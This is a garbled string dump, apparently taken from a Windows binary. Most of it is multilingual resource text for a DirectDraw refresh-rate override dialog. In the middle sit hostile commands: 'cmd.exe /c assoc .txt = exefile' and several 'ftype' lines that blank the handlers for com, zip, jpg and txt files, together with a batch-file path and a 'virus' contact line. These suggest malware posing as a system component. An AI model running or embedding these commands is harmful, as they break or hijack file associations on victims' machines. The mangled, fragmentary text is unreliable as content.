�f�r�e�k�v�e�n�c�e�
M�S� �S�h�e�l�l� �D�l�g�
S�t�o�r�n�o�
O�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e�
�h�o�d�n�o�t�a�:�
U�p�o�z�o�r�n�
:� �T�a�t�o� �n�a�s�t�a�v�e�n�
n�i�t� �p�o�u�z�e� �z�k�u�
i�v�a�t�e�l�
C�h�c�e�t�e�-�l�i� �p�o�u�
�n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e� �r�o�z�h�r�a�n�
�D�i�r�e�c�t�D�r�a�w�,� �k�l�e�p�n�
t�e� �n�a� �p�
.� �J�i�n�a�k� �k�l�e�p�n�
t�e� �n�a� �p�
�h�o�d�n�o�t�a� �a� �z�a�d�e�j�t�e� �p�o�
a�d�o�v�a�n�o�u� �o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�i�.�
S�k�i�f�t� �a�f� �o�p�d�a�t�e�r�i�n�g�s�f�u�n�k�t�i�o�n� �t�i�l� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�l�e�r�
O�p�d�a�t�e�r�i�n�g�s�h�a�s�t�i�g�h�e�d�
&�S�t�a�n�d�a�r�d�
N�y� �&�o�p�d�a�t�e�r�i�n�g�s�v�
A�d�v�a�r�s�e�l�!� �K�u�n� �e�r�f�a�r�n�e� �b�r�u�g�e�r�e� �b�
n�d�r�e� �d�i�s�s�e� �i�n�d�s�t�i�l�l�i�n�g�e�r�.�
K�l�i�k� �p�
�"�S�t�a�n�d�a�r�d�"� �f�o�r� �a�t� �b�r�u�g�e� �D�i�r�e�c�t�D�r�a�w�s� �s�t�a�n�d�a�r�d�o�p�d�a�t�e�r�i�n�g�,� �e�l�l�e�r� �k�l�i�k� �p�
�"�N�y� �o�p�d�a�t�e�r�i�n�g�s�v�
r�d�i�"� �o�g� �s�k�r�i�v� �d�e�n� �o�p�d�a�t�e�r�i�n�g�s�h�a�s�t�i�g�h�e�d�,� �s�o�m� �d�u� �v�i�l� �b�r�u�g�e�.�
D�i�r�e�c�t�D�r�a�w�-�A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�v�e�r�h�a�l�t�e�n�
M�S� �S�h�e�l�l� �D�l�g�
A�b�b�r�e�c�h�e�n�
A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�r�a�t�e�
&�S�t�a�n�d�a�r�d�
&�W�e�r�t� �f�
r� �d�i�e� �A�u�
e�r�k�r�a�f�t�s�e�t�z�u�n�g�:�
W�a�r�n�u�n�g�:� �D�i�e�s�e� �E�i�n�s�t�e�l�l�u�n�g�e�n� �s�o�l�l�t�e�n� �n�u�r� �v�o�n� �f�o�r�t�g�e�s�c�h�r�i�t�t�e�n�e�n� �B�e�n�u�t�z�e�r�n� �g�e�
n�d�e�r�t� �w�e�r�d�e�n�.�
K�l�i�c�k�e�n� �S�i�e� �a�u�f� �"�S�t�a�n�d�a�r�d�"�,� �u�m� �d�a�s� �S�t�a�n�d�a�r�d�v�e�r�h�a�l�t�e�n� �v�o�n� �D�i�r�e�c�t�D�r�a�w� �z�u� �v�e�r�w�e�n�d�e�n�,� �o�d�e�r� �k�l�i�c�k�e�n� �S�i�e� �a�u�f� �"�W�e�r�t� �f�
r� �d�i�e� �A�u�
e�r�k�r�a�f�t�s�e�t�z�u�n�g�"�,� �u�n�d� �g�e�b�e�n� �S�i�e� �d�i�e� �g�e�w�
n�s�c�h�t�e� �A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�r�a�t�e� �e�i�n�.�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
O�v�e�r�r�i�d�e� �D�i�r�e�c�t�D�r�a�w� �R�e�f�r�e�s�h� �B�e�h�a�v�i�o�r�
M�S� �S�h�e�l�l� �D�l�g�
C�a�n�c�e�l�
R�e�f�r�e�s�h� �R�a�t�e�
&�D�e�f�a�u�l�t�
&�O�v�e�r�r�i�d�e� �V�a�l�u�e�:�
W�a�r�n�i�n�g�:� �O�n�l�y� �a�d�v�a�n�c�e�d� �u�s�e�r�s� �s�h�o�u�l�d� �c�h�a�n�g�e� �t�h�e�s�e� �s�e�t�t�i�n�g�s�.�
C�l�i�c�k� �"�D�e�f�a�u�l�t�"� �t�o� �u�s�e� �D�i�r�e�c�t�D�r�a�w�'�s� �d�e�f�a�u�l�t� �b�e�h�a�v�i�o�r�,� �o�r� �c�l�i�c�k� �"�O�v�e�r�r�i�d�e� �V�a�l�u�e�"� �a�n�d� �t�y�p�e� �t�h�e� �r�e�f�r�e�s�h� �r�a�t�e� �t�h�a�t� �y�o�u� �w�a�n�t� �t�o� �f�o�r�c�e� �i�n�t�o� �t�h�e� �e�d�i�t� �b�o�x�.�
K�o�r�v�a�a� �D�i�r�e�c�t�D�r�a�w�'�n� �v�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s�
M�S� �S�h�e�l�l� �D�l�g�
P�e�r�u�u�t�a�
V�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s�
&�O�l�e�t�u�s�
&�K�o�r�v�a�u�s�a�r�v�o�:�
V�a�r�o�i�t�u�s�:� �V�a�i�n� �k�o�k�e�n�e�i�d�e�n� �k�
j�i�e�n� �t�u�l�i�s�i� �m�u�u�t�t�a�a� �n�
�a�s�e�t�u�k�s�i�a�.�
�D�i�r�e�c�t�D�r�a�w�'�n� �o�l�e�t�u�s�a�r�v�o�a� �v�a�l�i�t�s�e�m�a�l�l�a� �O�l�e�t�u�s� �t�a�i� �k�i�r�j�o�i�t�a� �h�a�l�u�a�m�a�s�i� �v�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s� �K�o�r�v�a�u�s�a�r�v�o�-�r�u�u�t�u�u�n�.�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�e�r�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t�
&�P�a�r� �d�
&�R�e�m�p�l�a�c�e�r� �p�a�r� �l�a� �v�a�l�e�u�r�
A�t�t�e�n�t�i�o�n�
:� �n�e� �m�o�d�i�f�i�e�z� �c�e�s� �p�a�r�a�m�
t�r�e�s� �q�u�e� �s�i� �v�o�u�s� �
t�e�s� �u�n� �u�t�i�l�i�s�a�t�e�u�r� �e�x�p�
r�i�m�e�n�t�
C�l�i�q�u�e�z� �s�u�r� �"�P�a�r� �d�
f�a�u�t�"� �p�o�u�r� �u�t�i�l�i�s�e�r� �l�a� �f�r�
q�u�e�n�c�e� �p�a�r� �d�
f�a�u�t� �d�e� �D�i�r�e�c�t�D�r�a�w�,� �o�u� �c�l�i�q�u�e�z� �s�u�r� �"�R�e�m�p�l�a�c�e�r� �p�a�r� �l�a� �v�a�l�e�u�r�"� �e�t� �e�n�t�r�e�z� �u�n�e� �f�r�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t� �d�a�n�s� �l�a� �z�o�n�e� �d�e� �t�e�x�t�e�.�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w�,� �
A� �D�i�r�e�c�t�D�r�a�w� �f�r�i�s�s�
s�i� �v�i�s�e�l�k�e�d�
n�e�k� �f�e�l�
M�S� �S�h�e�l�l� �D�l�g�
A�z� �&�a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �
k� �h�a�s�z�n�
k� �&�f�e�l�
F�i�g�y�e�l�m�e�z�t�e�t�
s�:� �E�z�e�k�e�t� �a� �b�e�
s�o�k�a�t� �c�s�a�k� �g�y�a�k�o�r�l�o�t�t� �f�e�l�h�a�s�z�n�
A� �D�i�r�e�c�t�D�r�a�w� �a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �v�i�s�e�l�k�e�d�
n�e�k� �h�a�s�z�n�
h�o�z� �j�e�l�
l�j�e� �b�e� �a�z� �"�A�z� �a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �
k� �h�a�s�z�n�
l�a�t�a�"� �l�e�h�e�t�
g�e�t�,� �v�a�g�y� �"�A�z� �
s�a�"� �b�e�j�e�l�
n� �m�e�g�a�d�h�a�t�j�a�,� �h�o�g�y� �m�i�l�y�e�n� �f�r�i�s�s�
k�e�t� �s�z�e�r�e�t�n�e� �h�a�s�z�n�
S�o�s�t�i�t�u�z�i�o�n�e� �f�r�e�q�u�e�n�z�a� �a�g�g�i�o�r�n�a�m�e�n�t�o� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�l�a�
F�r�e�q�u�e�n�z�a� �d�i� �a�g�g�i�o�r�n�a�m�e�n�t�o�
I�m�p�o�s�t�a�z�i�o�n�i� �&�p�r�e�d�e�f�i�n�i�t�e�
&�S�o�s�t�i�t�u�i�s�c�i� �c�o�n�:�
A�v�v�i�s�o�:� �q�u�e�s�t�e� �i�m�p�o�s�t�a�z�i�o�n�i� �d�o�v�r�e�b�b�e�r�o� �e�s�s�e�r�e� �m�o�d�i�f�i�c�a�t�e� �s�o�l�o� �d�a� �u�t�e�n�t�i� �e�s�p�e�r�t�i�.�
S�c�e�g�l�i�e�r�e� �"�I�m�p�o�s�t�a�z�i�o�n�i� �p�r�e�d�e�f�i�n�i�t�e�"� �p�e�r� �u�t�i�l�i�z�z�a�r�e� �l�e� �i�m�p�o�s�t�a�z�i�o�n�i� �p�r�e�d�e�f�i�n�i�t�e� �d�i� �D�i�r�e�c�t�D�r�a�w� �o�p�p�u�r�e� �s�c�e�g�l�i�e�r�e� �"�S�o�s�t�i�t�u�i�s�c�i� �c�o�n�"� �e� �i�m�m�e�t�t�e�r�e� �n�e�l�l�a� �c�a�s�e�l�l�a� �d�i� �m�o�d�i�f�i�c�a� �l�a� �n�u�o�v�a� �f�r�e�q�u�e�n�z�a� �d�i� �a�g�g�i�o�r�n�a�m�e�n�t�o� �d�a� �i�m�p�o�s�t�a�r�e�.�
D�i�r�e�c�t�D�r�a�w� �
M�S� �U�I� �G�o�t�h�i�c�
D�i�r�e�c�t�D�r�a�w� �
D�i�r�e�c�t�D�r�a�w� �
D�i�r�e�c�t�D�r�a�w�
D�i�r�e�c�t�D�r�a�w�-�v�e�r�n�i�e�u�w�i�n�g�s�g�e�d�r�a�g� �w�i�j�z�i�g�e�n�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�e�r�e�n�
V�e�r�n�i�e�u�w�i�n�g�s�f�r�e�q�u�e�n�t�i�e�
&�S�t�a�n�d�a�a�r�d�
A�n�d�e�r�e� �&�w�a�a�r�d�e�:�
W�a�a�r�s�c�h�u�w�i�n�g�:� �d�e�z�e� �i�n�s�t�e�l�l�i�n�g�e�n� �d�i�e�n�e�n� �a�l�l�e�e�n� �d�o�o�r� �e�r�v�a�r�e�n� �g�e�b�r�u�i�k�e�r�s� �t�e� �w�o�r�d�e�n� �g�e�w�i�j�z�i�g�d�.�
K�i�e�s� �S�t�a�n�d�a�a�r�d� �a�l�s� �u� �v�o�o�r� �h�e�t� �s�t�a�n�d�a�a�r�d�g�e�d�r�a�g� �v�a�n� �D�i�r�e�c�t�D�r�a�w� �k�i�e�s�t�.� �K�i�e�s� �a�n�d�e�r�s� �A�n�d�e�r�e� �w�a�a�r�d�e� �e�n� �g�e�e�f� �d�e� �v�e�r�n�i�e�u�w�i�n�g�s�f�r�e�q�u�e�n�t�i�e� �d�i�e� �u� �w�i�l�t� �g�e�b�r�u�i�k�e�n� �i�n� �h�e�t� �i�n�v�o�e�r�v�a�k� �o�p�.�
O�v�e�r�s�t�y�r� �D�i�r�e�c�t�D�r�a�w�-�o�p�p�d�a�t�e�r�i�n�g�s�o�p�p�f�
M�S� �S�h�e�l�l� �D�l�g�
A�v�b�r�y�t�
O�p�p�d�a�t�e�r�i�n�g�s�f�r�e�k�v�e�n�s�
&�S�t�a�n�d�a�r�d�
&�O�v�e�r�s�t�y�r�i�n�g�s�v�e�r�d�i�:�
A�d�v�a�r�s�e�l�!� � �B�a�r�e� �a�v�a�n�s�e�r�t�e� �b�r�u�k�e�r�e� �b�
r� �e�n�d�r�e� �d�i�s�s�e� �i�n�n�s�t�i�l�l�i�n�g�e�n�e�.�
K�l�i�k�k� �S�t�a�n�d�a�r�d� �f�o�r� �
�b�r�u�k�e� �s�t�a�n�d�a�r�d�o�p�p�f�
r�s�e�l�e�n� �i� �D�i�r�e�c�t�D�r�a�w�,� �e�l�l�e�r� �K�l�i�k�k� �O�v�e�r�s�t�y�r�i�n�g�s�v�e�r�d�i� �o�g� �a�n�g�i� �o�p�p�d�a�t�e�r�i�n�g�s�f�r�e�k�v�e�n�s�e�n� �d�u� �v�i�l� �t�v�i�n�g�e� �i� �r�e�d�i�g�e�r�i�n�g�s�b�o�k�s�e�n�.�
Z�m�i�e�n�i�a�n�i�e� �z�a�c�h�o�w�a�n�i�a� �f�u�n�k�c�j�i� �o�d�
a�n�i�a� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�u�l�u�j�
s�t�o�t�l�i�w�o�
&�W�a�r�t�o�
O�s�t�r�z�e�
e�n�i�e�:� �t�e� �u�s�t�a�w�i�e�n�i�a� �p�o�w�i�n�n�i� �z�m�i�e�n�i�a�
�t�y�l�k�o� �z�a�a�w�a�n�s�o�w�a�n�i� �u�
y�t�k�o�w�n�i�c�y�.�
K�l�i�k�n�i�j� �o�p�c�j�
,� �a�b�y� �u�
l�n�e�g�o� �z�a�c�h�o�w�a�n�i�a� �p�r�o�g�r�a�m�u� �D�i�r�e�c�t�D�r�a�w�,� �l�u�b� �k�l�i�k�n�i�j� �o�p�c�j�
�i� �w�p�i�s�z� �
s�t�o�t�l�i�w�o�
a�n�i�a� �w� �p�o�l�u� �e�d�y�c�y�j�n�y�m�.�
S�u�b�s�t�i�t�u�i�r� �c�o�m�p�o�r�t�a�m�e�n�t�o� �d�e� �a�t�u�a�l�i�z�a�
o� �d�o� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
C�a�n�c�e�l�a�r�
T�a�x�a� �d�e� �a�t�u�a�l�i�z�a�
&�S�u�b�s�t�i�t�u�i�r� �v�a�l�o�r�:�
A�v�i�s�o�:� �s�o�m�e�n�t�e� �u�s�u�
r�i�o�s� �a�v�a�n�
a�d�o�s� �d�e�v�e�m� �a�l�t�e�r�a�r� �e�s�t�a�s� �c�o�n�f�i�g�u�r�a�
C�l�i�q�u�e� �e�m� �'�P�a�d�r�
o�'� �p�a�r�a� �u�s�a�r� �o� �c�o�m�p�o�r�t�a�m�e�n�t�o� �p�a�d�r�
o� �d�o� �D�i�r�e�c�t�D�r�a�w� �o�u� �c�l�i�q�u�e� �e�m� �'�S�u�b�s�t�i�t�u�i�r� �v�a�l�o�r�'� �e� �d�i�g�i�t�e� �a� �t�a�x�a� �d�e� �a�t�u�a�l�i�z�a�
o� �q�u�e� �v�o�c�
�d�e�s�e�j�a� �f�o�r�
a�r� �n�a� �c�a�i�x�a� �d�e� �e�d�i�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
t�t� �u�p�p�d�a�t�e�r�i�n�g�s�f�
r�f�a�r�a�n�d�e� �f�
r� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�v�b�r�y�t�
U�p�p�d�a�t�e�r�i�n�g�s�i�n�t�e�r�v�a�l�l�
&�S�t�a�n�d�a�r�d�
&�E�g�e�t� �v�
V�a�r�n�i�n�g�!� �E�n�d�a�s�t� �a�v�a�n�c�e�r�a�d�e� �a�n�v�
n�d�a�r�e� �b�
n�d�r�a� �d�e�s�s�a� �i�n�s�t�
l�l�n�i�n�g�a�r�.�
K�l�i�c�k�a� �p�
�S�t�a�n�d�a�r�d� �o�m� �d�u� �v�i�l�l� �a�n�v�
n�d�a� �s�t�a�n�d�a�r�d�v�
r�d�e�n� �f�
r� �D�i�r�e�c�t�D�r�a�w�.� �K�l�i�c�k�a� �p�
�E�g�e�t� �v�
r�d�e� �o�c�h� �a�n�g�e� �u�p�p�d�a�t�e�r�i�n�g�s�i�n�t�e�r�v�a�l�l� �o�m� �d�u� �i�n�t�e� �v�i�l�l� �a�n�v�
n�d�a� �s�t�a�n�d�a�r�d�v�
D�i�r�e�c�t�D�r�a�w� �Y�e�n�i�l�e�m�e� �D�a�v�r�a�n�
e�r�s�i�z� �K�
M�S� �S�h�e�l�l� �D�l�g�
Y�e�n�i�l�e�m�e� �H�
&�V�a�r�s�a�y�
e�r�s�i�z� �K�
l�m�a� �D�e�
:� �B�u� �a�y�a�r�l�a�r�
z�c�a� �i�l�e�r�i� �d�
z�e�y� �k�u�l�l�a�n�
l�a�r� �d�e�
t�i�r�m�e�l�i�.�
D�i�r�e�c�t�D�r�a�w�'�u�n� �v�a�r�s�a�y�
l�a�n� �d�a�v�r�a�n�
�k�u�l�l�a�n�m�a�k� �i�
i�n� �"�V�a�r�s�a�y�
n� �y�a� �d�a� �"�G�e�
e�r�s�i�z� �K�
c�m�d�.�e�x�e�
M�d�5�_�S�t�r�i�n�g�_�C�a�l�c�
C�:�\�1�2�3�.�b�a�t�
c�m�d�.�e�x�e� �/�c� �a�s�s�o�c� �.�t�x�t� �=� �e�x�e�f�i�l�e�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �c�o�m�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �z�i�p�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �j�p�g�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �t�x�t�f�i�l�e�=�
�z�n�k�z�z�
v�i�r�u�s� �Q�Q� �6�2�1�3�7�0�9�0�2�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�8�0�4�0�4�B�0�
C�o�m�p�a�n�y�N�a�m�e�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
L�e�g�a�l�T�r�a�d�e�m�a�r�k�s�
P�r�o�d�u�c�t�N�a�m�e�
F�i�l�e�V�e�r�s�i�o�n�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
I�n�t�e�r�n�a�l�N�a�m�e�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
`�\�k�h�c�q�
`�\�k�h�c�q�
`�\�k�h�c�q�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
e�p�s�a�t� �n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e�
M�S� �S�h�e�l�l� �D�l�g�
S�t�o�r�n�o�
O�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e�
�h�o�d�n�o�t�a�:�
U�p�o�z�o�r�n�
:� �T�a�t�o� �n�a�s�t�a�v�e�n�
n�i�t� �p�o�u�z�e� �z�k�u�
i�v�a�t�e�l�
C�h�c�e�t�e�-�l�i� �p�o�u�
�n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�e� �r�o�z�h�r�a�n�
�D�i�r�e�c�t�D�r�a�w�,� �k�l�e�p�n�
t�e� �n�a� �p�
.� �J�i�n�a�k� �k�l�e�p�n�
t�e� �n�a� �p�
�h�o�d�n�o�t�a� �a� �z�a�d�e�j�t�e� �p�o�
a�d�o�v�a�n�o�u� �o�b�n�o�v�o�v�a�c�
�f�r�e�k�v�e�n�c�i�.�
S�k�i�f�t� �a�f� �o�p�d�a�t�e�r�i�n�g�s�f�u�n�k�t�i�o�n� �t�i�l� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�l�e�r�
O�p�d�a�t�e�r�i�n�g�s�h�a�s�t�i�g�h�e�d�
&�S�t�a�n�d�a�r�d�
N�y� �&�o�p�d�a�t�e�r�i�n�g�s�v�
A�d�v�a�r�s�e�l�!� �K�u�n� �e�r�f�a�r�n�e� �b�r�u�g�e�r�e� �b�
n�d�r�e� �d�i�s�s�e� �i�n�d�s�t�i�l�l�i�n�g�e�r�.�
K�l�i�k� �p�
�"�S�t�a�n�d�a�r�d�"� �f�o�r� �a�t� �b�r�u�g�e� �D�i�r�e�c�t�D�r�a�w�s� �s�t�a�n�d�a�r�d�o�p�d�a�t�e�r�i�n�g�,� �e�l�l�e�r� �k�l�i�k� �p�
�"�N�y� �o�p�d�a�t�e�r�i�n�g�s�v�
r�d�i�"� �o�g� �s�k�r�i�v� �d�e�n� �o�p�d�a�t�e�r�i�n�g�s�h�a�s�t�i�g�h�e�d�,� �s�o�m� �d�u� �v�i�l� �b�r�u�g�e�.�
D�i�r�e�c�t�D�r�a�w�-�A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�v�e�r�h�a�l�t�e�n�
M�S� �S�h�e�l�l� �D�l�g�
A�b�b�r�e�c�h�e�n�
A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�r�a�t�e�
&�S�t�a�n�d�a�r�d�
&�W�e�r�t� �f�
r� �d�i�e� �A�u�
e�r�k�r�a�f�t�s�e�t�z�u�n�g�:�
W�a�r�n�u�n�g�:� �D�i�e�s�e� �E�i�n�s�t�e�l�l�u�n�g�e�n� �s�o�l�l�t�e�n� �n�u�r� �v�o�n� �f�o�r�t�g�e�s�c�h�r�i�t�t�e�n�e�n� �B�e�n�u�t�z�e�r�n� �g�e�
n�d�e�r�t� �w�e�r�d�e�n�.�
K�l�i�c�k�e�n� �S�i�e� �a�u�f� �"�S�t�a�n�d�a�r�d�"�,� �u�m� �d�a�s� �S�t�a�n�d�a�r�d�v�e�r�h�a�l�t�e�n� �v�o�n� �D�i�r�e�c�t�D�r�a�w� �z�u� �v�e�r�w�e�n�d�e�n�,� �o�d�e�r� �k�l�i�c�k�e�n� �S�i�e� �a�u�f� �"�W�e�r�t� �f�
r� �d�i�e� �A�u�
e�r�k�r�a�f�t�s�e�t�z�u�n�g�"�,� �u�n�d� �g�e�b�e�n� �S�i�e� �d�i�e� �g�e�w�
n�s�c�h�t�e� �A�k�t�u�a�l�i�s�i�e�r�u�n�g�s�r�a�t�e� �e�i�n�.�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
O�v�e�r�r�i�d�e� �D�i�r�e�c�t�D�r�a�w� �R�e�f�r�e�s�h� �B�e�h�a�v�i�o�r�
M�S� �S�h�e�l�l� �D�l�g�
C�a�n�c�e�l�
R�e�f�r�e�s�h� �R�a�t�e�
&�D�e�f�a�u�l�t�
&�O�v�e�r�r�i�d�e� �V�a�l�u�e�:�
W�a�r�n�i�n�g�:� �O�n�l�y� �a�d�v�a�n�c�e�d� �u�s�e�r�s� �s�h�o�u�l�d� �c�h�a�n�g�e� �t�h�e�s�e� �s�e�t�t�i�n�g�s�.�
C�l�i�c�k� �"�D�e�f�a�u�l�t�"� �t�o� �u�s�e� �D�i�r�e�c�t�D�r�a�w�'�s� �d�e�f�a�u�l�t� �b�e�h�a�v�i�o�r�,� �o�r� �c�l�i�c�k� �"�O�v�e�r�r�i�d�e� �V�a�l�u�e�"� �a�n�d� �t�y�p�e� �t�h�e� �r�e�f�r�e�s�h� �r�a�t�e� �t�h�a�t� �y�o�u� �w�a�n�t� �t�o� �f�o�r�c�e� �i�n�t�o� �t�h�e� �e�d�i�t� �b�o�x�.�
K�o�r�v�a�a� �D�i�r�e�c�t�D�r�a�w�'�n� �v�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s�
M�S� �S�h�e�l�l� �D�l�g�
P�e�r�u�u�t�a�
V�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s�
&�O�l�e�t�u�s�
&�K�o�r�v�a�u�s�a�r�v�o�:�
V�a�r�o�i�t�u�s�:� �V�a�i�n� �k�o�k�e�n�e�i�d�e�n� �k�
j�i�e�n� �t�u�l�i�s�i� �m�u�u�t�t�a�a� �n�
�a�s�e�t�u�k�s�i�a�.�
�D�i�r�e�c�t�D�r�a�w�'�n� �o�l�e�t�u�s�a�r�v�o�a� �v�a�l�i�t�s�e�m�a�l�l�a� �O�l�e�t�u�s� �t�a�i� �k�i�r�j�o�i�t�a� �h�a�l�u�a�m�a�s�i� �v�i�r�k�i�s�t�y�s�t�a�a�j�u�u�s� �K�o�r�v�a�u�s�a�r�v�o�-�r�u�u�t�u�u�n�.�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�e�r�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t�
&�P�a�r� �d�
&�R�e�m�p�l�a�c�e�r� �p�a�r� �l�a� �v�a�l�e�u�r�
A�t�t�e�n�t�i�o�n�
:� �n�e� �m�o�d�i�f�i�e�z� �c�e�s� �p�a�r�a�m�
t�r�e�s� �q�u�e� �s�i� �v�o�u�s� �
t�e�s� �u�n� �u�t�i�l�i�s�a�t�e�u�r� �e�x�p�
r�i�m�e�n�t�
C�l�i�q�u�e�z� �s�u�r� �"�P�a�r� �d�
f�a�u�t�"� �p�o�u�r� �u�t�i�l�i�s�e�r� �l�a� �f�r�
q�u�e�n�c�e� �p�a�r� �d�
f�a�u�t� �d�e� �D�i�r�e�c�t�D�r�a�w�,� �o�u� �c�l�i�q�u�e�z� �s�u�r� �"�R�e�m�p�l�a�c�e�r� �p�a�r� �l�a� �v�a�l�e�u�r�"� �e�t� �e�n�t�r�e�z� �u�n�e� �f�r�
q�u�e�n�c�e� �d�e� �r�a�f�r�a�
c�h�i�s�s�e�m�e�n�t� �d�a�n�s� �l�a� �z�o�n�e� �d�e� �t�e�x�t�e�.�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w�,� �
A� �D�i�r�e�c�t�D�r�a�w� �f�r�i�s�s�
s�i� �v�i�s�e�l�k�e�d�
n�e�k� �f�e�l�
M�S� �S�h�e�l�l� �D�l�g�
A�z� �&�a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �
k� �h�a�s�z�n�
k� �&�f�e�l�
F�i�g�y�e�l�m�e�z�t�e�t�
s�:� �E�z�e�k�e�t� �a� �b�e�
s�o�k�a�t� �c�s�a�k� �g�y�a�k�o�r�l�o�t�t� �f�e�l�h�a�s�z�n�
A� �D�i�r�e�c�t�D�r�a�w� �a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �v�i�s�e�l�k�e�d�
n�e�k� �h�a�s�z�n�
h�o�z� �j�e�l�
l�j�e� �b�e� �a�z� �"�A�z� �a�l�a�p�
r�t�e�l�m�e�z�e�t�t� �
k� �h�a�s�z�n�
l�a�t�a�"� �l�e�h�e�t�
g�e�t�,� �v�a�g�y� �"�A�z� �
s�a�"� �b�e�j�e�l�
n� �m�e�g�a�d�h�a�t�j�a�,� �h�o�g�y� �m�i�l�y�e�n� �f�r�i�s�s�
k�e�t� �s�z�e�r�e�t�n�e� �h�a�s�z�n�
S�o�s�t�i�t�u�z�i�o�n�e� �f�r�e�q�u�e�n�z�a� �a�g�g�i�o�r�n�a�m�e�n�t�o� �D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
A�n�n�u�l�l�a�
F�r�e�q�u�e�n�z�a� �d�i� �a�g�g�i�o�r�n�a�m�e�n�t�o�
I�m�p�o�s�t�a�z�i�o�n�i� �&�p�r�e�d�e�f�i�n�i�t�e�
&�S�o�s�t�i�t�u�i�s�c�i� �c�o�n�:�
A�v�v�i�s�o�:� �q�u�e�s�t�e� �i�m�p�o�s�t�a�z�i�o�n�i� �d�o�v�r�e�b�b�e�r�o� �e�s�s�e�r�e� �m�o�d�i�f�i�c�a�t�e� �s�o�l�o� �d�a� �u�t�e�n�t�i� �e�s�p�e�r�t�i�.�
S�c�e�g�l�i�e�r�e� �"�I�m�p�o�s�t�a�z�i�o�n�i� �p�r�e�d�e�f�i�n�i�t�e�"� �p�e�r� �u�t�i�l�i�z�z�a�r�e� �l�e� �i�m�p�o�s�t�a�z�i�o�n�i� �p�r�e�d�e�f�i�n�i�t�e� �d�i� �D�i�r�e�c�t�D�r�a�w� �o�p�p�u�r�e� �s�c�e�g�l�i�e�r�e� �"�S�o�s�t�i�t�u�i�s�c�i� �c�o�n�"� �e� �i�m�m�e�t�t�e�r�e� �n�e�l�l�a� �c�a�s�e�l�l�a� �d�i� �m�o�d�i�f�i�c�a� �l�a� �n�u�o�v�a� �f�r�e�q�u�e�n�z�a� �d�i� �a�g�g�i�o�r�n�a�m�e�n�t�o� �d�a� �i�m�p�o�s�t�a�r�e�.�
D�i�r�e�c�t�D�r�a�w� �
M�S� �U�I� �G�o�t�h�i�c�
D�i�r�e�c�t�D�r�a�w� �
D�i�r�e�c�t�D�r�a�w� �
